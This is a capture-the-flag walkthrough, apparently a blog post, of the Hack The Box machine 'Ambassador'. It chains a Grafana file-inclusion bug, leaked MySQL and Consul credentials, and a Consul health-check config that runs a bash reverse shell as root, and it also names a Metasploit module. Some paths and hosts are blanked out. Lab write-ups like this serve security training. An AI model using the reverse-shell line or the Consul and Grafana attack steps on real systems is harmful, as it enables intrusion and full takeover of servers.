Ambassador — Hackthebox walkthorugh

Kavishka Gihan
5 min readJan 28, 2023


Doing the initial nmap scan, we see 4 ports open

22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 29:dd:8e:d7:17:1e:8e:30:90:87:3c:c6:51:00:7c:75 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDLYy5+VCwR+2NKWpIRhSVGI1nJQ5YeihevJqIYbfopEW03vZ9SgacRzs4coGfDbcYa+KPePbz2n+2zXytEPfzBzFysLXgTaUlDFcDqEsWP9pJ5UYFNfXqHCOyDRkl
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Ambassador Development Server
|_http-generator: Hugo 0.94.2
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open ppp? syn-ack
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Mon, 03 Oct 2022 04:37:31 GMT
| Content-Length: 29
| href="/login">Found</a>.
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
3306/tcp open mysql syn-ack MySQL 8.0.30-0ubuntu0.20.04.2
| mysql-info:
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 12
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsTransactions, IgnoreSigpipes, SupportsCompression, SwitchToSSLAfterHandshake, FoundRows, ODBCClien
t, ConnectWithDatabase, Speaks41ProtocolNew, LongColumnFlag, DontAllowDatabaseTableColumn, LongPassword, SupportsLoadDataLocal, InteractiveClient, IgnoreSpaceBeforeP
arenthesis, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: \x1D?!9'Z3\x01cc5\x1E:`9mj\x0D99
|_ Auth Plugin Name: caching_sha2_password

Looking at port 3000, we see it’s runnning Grafana At the bottom we can see it’s version at v8.2.0

Looking for exploits for this version, we see an Local File Inclusion vulnerability exists for versions from 8.1.0 to 8.3.0

I also found a python script to exploit this

But unfortunately this didn’t work for me, so I had to look in to the source code and figure out how to exploit this manually.

Seems like it’s getting an vulnerable endpoint and sending a typical LFI payload. Following the exploit, I was able to get the contents of the /etc/passwd file with this payload.

Here, I found out that there is a user called developer

Since I there is Grafana running, with this LFI, I looked into it’s configuration file at /etc/grafana/grafana.ini

From there, I found that there was a sqlite3 database to look for. It was at /var/lib/grafana/grafana.db

So I downloaded it and opened it with sqlitbrowser

From there I found the password to login to the mysql server as grafana user.

mysql -u grafana -p -h -p'dontStandSoCloseToMe63221!'

Looking through the databases, I saw there was a database called whackywidget quering this database, I was able to a base64 encoded password for the developer use

By decoding this, I was able to login with ssh as developer



Looking through the file system, I saw there was a git repo in /opt/my-app Looking for previous commits in the repo with git show , I was able to get a token for consul

Looking at the open ports, I saw port 8500 was open, which is the default port for consul service

Also consul was running as root

From this point onwards, there are 2 ways to go.

Method I — Manual exploitation with health check scripts

So I started enumerating the service more. Then I was able to figure out that the config directory for consul was writable by the developer user.

I did a little googling and found out that I can add health check scripts for consul which will be triggered upon restart. So I made a health check script which would execute a bash script that includes a reverse shell.

"check": {
"id": "shell",
"name": "Shell",
"args": ["/tmp/"],
"interval": "10s",
"timeout": "600s"

I moved this file to the config directory of consul

cp /tmp/check.json /etc/consul.d/config.d/

And for the reverse shell(/tmp/, I used the typical bash reverse shell.

bash -c 'bash -i >& /dev/tcp/ 0>&1'

Once everything was in place, I restarted the consul service

consul reload --token bb03b43b-1d81-d62b-24b5-39540ee469b5

Then I got a shell on my listener.

Method II — Exploiting with Metasploit by registering a service

After while I was doing the box, I came across an exploit module from metasploit which could exploit the consul service by registering a new service.

For that you have to use the exploit/multi/misc/consul_service_exec module. You have to set the options as follows and simply run the module.

Once you run it, you should be able to get a full meterpreter session which then can be used to get a shell as root.


Contact me though social media:

Email —
Instagram —
Discord — kavigihan#8518

Happy Hacking !!! 😄



Kavishka Gihan

Cyber Security Student | Machine author @hackthebox | find me on instagram @_kavi.gihan